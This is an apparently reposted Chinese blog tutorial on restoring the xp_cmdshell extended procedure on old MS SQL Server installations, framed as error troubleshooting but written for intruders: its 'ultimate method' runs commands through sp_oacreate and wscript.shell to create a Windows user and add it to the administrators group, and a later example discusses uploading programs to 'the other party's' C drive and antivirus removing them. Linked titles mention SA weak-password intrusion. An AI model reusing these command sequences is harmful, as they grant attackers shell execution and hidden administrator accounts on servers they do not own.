删除和恢复xp_cmdshell的经典教程

最新推荐文章于 2022-08-29 20:09:47 发布
最新推荐文章于 2022-08-29 20:09:47 发布
阅读量693 收藏 1
点赞数
分类专栏: 脚本

常见情况恢复执行xp_cmdshell.

1 未能找到存储过程'master..xpcmdshell'.
     恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'        
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'

例一:C:\>DIR C:\

未能找到存储过程 'master..xp_cmdshell'。

遇到这样的问题我们该如何解决?

解决办法一:

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'declare @o int

尝试:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

解决办法二:;

Exec master.dbo.sp_addextendedproc xp_cmdshell @dllname='xplog70.dll';--

解决方法三:

       查询分离器连接后,
     第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 
     第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 
     然后按F5键命令执行完毕


例二:C:\>DIR C:\

Cannot load the DLL xplog70.dll, or one of the DLLs it references. Reason: 126(找不到指定的模块。) 
   遇到这样的问题我们该如何解决?

解决办法:

   查询分离器连接后,
执行:sp_dropextendedproc "xp_cmdshell"
接着:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

以上2个问题还可用此解决办法:使用SQL查询分析器登陆,然后输入如下指令一般都可以解决 (未竟本人亲自测试,仅转载,raymin)

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c 这里可任意加你要输入的命令 如(net user adong198 8 /add '--)
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add


例三:C:\>DIR C:\ 
   无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。) 
   遇到这样的问题我们该如何解决?

解决办法

执行:sp_dropextendedproc "xp_cmdshell"

接着:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'


第四:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
     恢复方法:查询分离器连接后,
     第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
     第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'        
     然后按F5键命令执行完毕

例五:明明将程序传到对方的C盘了,DIR C:\却找不到程序,为什么呢? 
   遇到这样的问题我们该如何解决?

解决办法:首先你确定复制过去了吗?确定那就运行一下,看看是否出现 [不是内部或外部命令,也不是可运行的程序] 等字样;如果你用的是SQLtool那个工具,我也遇见过,复制成功,但是找不到,可能那工具有问题,你用net share看看是否C盘是被共享的。还有就是被杀毒软件Kill了

kuxing100
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL存储过程恢复删除收集
Yatere的天平秤
05-08 2069
<br /><br />Error Message:未能找到存储过程 'master..xp_cmdshell'。<br />修复法:很通用的,其实碰到 其他126 127的都可以一起修复,<br />除了xplog70.dll其他的都可以用这命令修复<br />xp_cmdshell新的恢复办法 <br />第一步先删除:<br />drop procedure sp_addextendedproc <br />drop procedure sp_oacreate <br />exec sp_dropex
1433 SA弱口令入侵 XPCMDSHELL 恢复全攻略
01-31
把目前已知能够恢复1433 xpcmdshell master 全部SQL语句经过详细的整理后写成,虽然你下载的只是一个小小的TXT文件,但是里面包含着你现在非常需要,而且下载后会想永久保存的txt.资源分设高点为了防止过分滥传播!敬请谅解!小菜编译,老鸟请让步,谢谢!
xp_cmdshell删除恢复
edwang133
07-31 1241
 扩展储存过程被删除以后可以有很简单的办法恢复删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc (
恢复xp_cmdshell
php|nginx|python|vue|redis|linux
03-13 1693
 用这些命令恢复一下xp_cmdshell开启cmdshell的SQL语句EXEC sp_addextendedproc xp_cmdshell ,@dllname =xplog70.dll判断存储扩展是否存在Select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdsh
mysql恢复cmdshell_MySQL误操作恢复
weixin_35278163的博客
01-19 138
#!/bin/env python#-*- coding:utf-8 -*-importos,sys,re,getoptimportMySQLdbhost= '127.0.0.1'user= ''password= ''port= 3306start_datetime= '1971-01-01 00:00:00'stop_datetime= '2037-01-01 00:00:00'start_p...
SQL Server 2005 2008 xp_cmdshell 恢复与禁用
eldn__的专栏
12-03 3272
SQL Server 2005 2208 xp_cmdshell存储过程  默认禁用了,用下面的语句可以打开和禁用。 --SQL语句开xp_cmdshell -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the cur
SQL入侵恢复xp_cmdshell方法总结
09-11
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用
SQL Server如何启用xp_cmdshell组件1
08-08
在SQL Server中,`xp_cmdshell`是一个非常强大的系统存储过程,它允许数据库管理员执行操作系统级别的命令,并将结果返回到SQL Server环境中。然而,出于安全考虑,`xp_cmdshell`默认是禁用的,因为不恰当的使用可能...
xp_cmdshell开启与关闭
09-11
这将删除xp_cmdshell扩展存储过程,从而禁止xp_cmdshell的使用。 如果需要恢复xp_cmdshell,可以使用以下命令: ``` Use Master Exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll' Go ``` 这将恢复xp_cmd...
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过...
SQL阻止组件xp_cmdshell过程解决方案
01-19
 SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell'。有关启用'xp_cmdshell'的详细...
sql server 2005下开启xp_cmdshell的办法
weixin_33738982的博客
04-12 188
sql server 2005下开启xp_cmdshell的办法 2009年05月09日 星期六 下午 06:06 sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell...
truncate 删除以及利用xp_cmdshell一个完成的流程
weixin_64655821的博客
08-29 254
truncate 删除以及利用xp_cmdshell一个完成的流程
删除xp_cmdshell
降龙十八炒
03-29 1458
xp——cmdshell恢复(古老语言)(内有转载)
Coisini的博客
05-25 433
1 未能找到存储过程’master…xpcmdshell’. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll’declare @o int 第二步执行:sp_adde...
'xp_cmdshell' does not exist??
iteye_15269的博客
08-31 240
  EXEC sp_configure 'show advanced options', 1;GORECONFIGURE;GOEXEC sp_configure 'xp_cmdshell',1 GO RECONFIGURE GO Refer http://msdn.microsoft.com/en-us/library/ms189631.aspx for more options. ...
1433恢复总结(mssql)
天才少年程序员-李荣盛专栏
11-15 422
恢复sp_addextendedproc语句: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL contain
去掉xpcmdshell增加系统安全性
伴老
06-30 2108
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:以下是代码:if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cm
SQL Server 阻止了对组件“xp_cmdshell”的 过程“sys.xp_cmdshell”的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用“xp_cmdshell”。有关启用“xp_cmdshell”的详细信息,请搜索 SQL Server 联机丛书中的“xp_cmdshell”。
最新发布
06-06
这个错误提示是因为 SQL Server 阻止了对 `xp_cmdshell` 存储过程的访问,因为它被视为一个安全风险。如果你需要使用 `xp_cmdshell`,你需要先启用它。可以按照以下步骤启用 `xp_cmdshell`: 1. 使用管理员权限的帐户连接到 SQL Server 实例。 2. 运行以下命令以启用 `xp_cmdshell`: ``` sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE; ``` 3. 重新启动 SQL Server 服务以使更改生效。 请注意,启用 `xp_cmdshell` 可能会带来安全风险,因此请谨慎使用并确保已采取必要的安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值